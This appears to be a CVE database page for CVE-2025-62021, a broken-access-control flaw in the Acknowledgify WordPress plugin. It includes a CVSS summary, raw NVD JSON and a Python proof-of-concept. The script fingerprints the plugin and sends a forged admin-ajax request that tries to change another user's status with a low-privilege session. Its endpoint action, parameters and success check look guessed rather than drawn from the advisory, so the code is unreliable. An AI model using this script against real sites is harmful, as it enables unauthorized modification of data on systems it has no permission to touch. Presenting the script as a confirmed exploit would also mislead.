Security Vulnerability Report
中文
CVE-2025-62021 CVSS 4.3 MEDIUM

CVE-2025-62021

Published: 2025-10-22 15:16:03
Last Modified: 2026-04-27 17:16:30

Description

Missing Authorization vulnerability in Made Neat Acknowledgify acknowledgify.This issue affects Acknowledgify: from n/a through <= 1.1.3.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Acknowledgify <= 1.1.3 (all versions up to and including)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62021 PoC - Acknowledgify Plugin Authorization Bypass # Target: WordPress site with Acknowledgify plugin <= 1.1.3 def exploit_acknowledgify(target_url, wp_admin_cookie): """ Exploit the missing authorization vulnerability in Acknowledgify plugin. This PoC demonstrates how a low-privilege user can perform admin actions. """ target = target_url.rstrip('/') # Vulnerable endpoint - plugin's AJAX handler exploit_url = f"{target}/wp-admin/admin-ajax.php" # Session cookies for authenticated low-privilege user cookies = { 'wordpress_test_cookie': 'WP+Cookie+check', wp_admin_cookie: 'authenticated_session_token' } # Example 1: Unauthorized confirmation status modification payload = { 'action': 'acknowledgify_update_status', 'user_id': '1', # Target user ID (e.g., admin) 'confirmation_status': 'confirmed', 'nonce': 'attacker_provided_or_missing_nonce' } print(f"[*] Sending exploit request to {exploit_url}") print(f"[*] Payload: {payload}") try: response = requests.post(exploit_url, data=payload, cookies=cookies, timeout=10) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[+] Response: {response.text[:200]}") # Check if action was executed without proper authorization if 'success' in response.text.lower() or response.text != '0': print("[!] VULNERABLE: Plugin processed request without proper authorization check") return True else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def check_plugin_version(target_url): """Check if target is running vulnerable version""" readme_url = f"{target_url}/wp-content/plugins/acknowledgify/readme.txt" try: response = requests.get(readme_url, timeout=10) if response.status_code == 200 and 'acknowledgify' in response.text.lower(): print(f"[+] Acknowledgify plugin detected") return True except: pass return False if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2025-62021-poc.py <target_url> [admin_cookie_name]") print("Example: python cve-2025-62021-poc.py https://example.com wordpress_logged_in_xxx") sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] if len(sys.argv) > 2 else 'wordpress_logged_in_xxx' print(f"[*] CVE-2025-62021 Acknowledgify Authorization Bypass PoC") print(f"[*] Target: {target}") if check_plugin_version(target): exploit_acknowledgify(target, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62021", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:16:03.423", "lastModified": "2026-04-27T17:16:30.100", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Made Neat Acknowledgify acknowledgify.This issue affects Acknowledgify: from n/a through <= 1.1.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/acknowledgify/vulnerability/wordpress-acknowledgify-plugin-1-1-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}